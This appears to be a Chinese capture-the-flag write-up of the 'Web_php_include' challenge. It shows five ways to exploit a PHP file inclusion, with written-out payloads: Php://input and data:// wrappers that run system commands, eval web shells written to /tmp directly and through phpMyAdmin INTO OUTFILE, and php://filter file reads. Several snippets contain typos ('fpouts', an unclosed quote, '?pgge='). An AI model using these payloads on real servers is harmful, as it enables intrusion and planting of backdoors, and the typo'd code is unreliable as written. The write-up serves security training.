攻防世界(五)Web_php_include

攻防世界系列:Web_php_include

 

方法一:大小写绕过

 

strstr()函数对php我协议进行了过滤,但我们可以尝试大小写绕过

 

 

抓包POST传值让其执行我们输入的命令

?page=Php://input

 <?php system('ls'); ?>

 

 

发现可疑文件,执行命令打开

 

 

方法二:data://协议绕过

 

原理相同,不让用php我们就用data哈哈

?page=data://text/plain,<?php system('ls'); ?>

 

Tips:

data协议的一般格式

?page=data://text/plain,xxxxxxx

(xxxxxx为要执行的命令)

 

?pgge=data://text/plain,<?php system('cat fl4gisisish3r3.php'); ?>

 

 

 方法三:写入木马

 

既然我们可以在服务器执行PHP代码,就可以写入一句话然后用蚁剑连接(这里以方法二为例,用data://协议也可以)

<?php fpouts(fopen('/tmp/webshell.php','w'),'<?php @eval($_POST[root]); ?>

 Tips:

tmp是LINUX默认可写目录

 

 方法四:phpmyadmin写入木马

 

前提:

--用户 root 密码 空格 登录(此时为root权限)

--secure_file_priv为空(SHOW VARIABLES LIKE "secure_file_priv"命令查看是否为空)

 

select '<?php @eval($_POST[root]); ?> into OUTFILE '/tmp/shell.php'

 

 

蚁剑连接

 

 

 

 

 

 方法五:(仅仅是另一种查看文件的方式)

 

当我们知道flag的位置时,还可这样查看:

?page=Php://filter/convert.base64-encode/resource=fl4gisisish3r3.php

 

 

 解码即可

 

 

posted @ 2020-08-13 12:53  HUGBOY  阅读(1861)  评论(0编辑  收藏  举报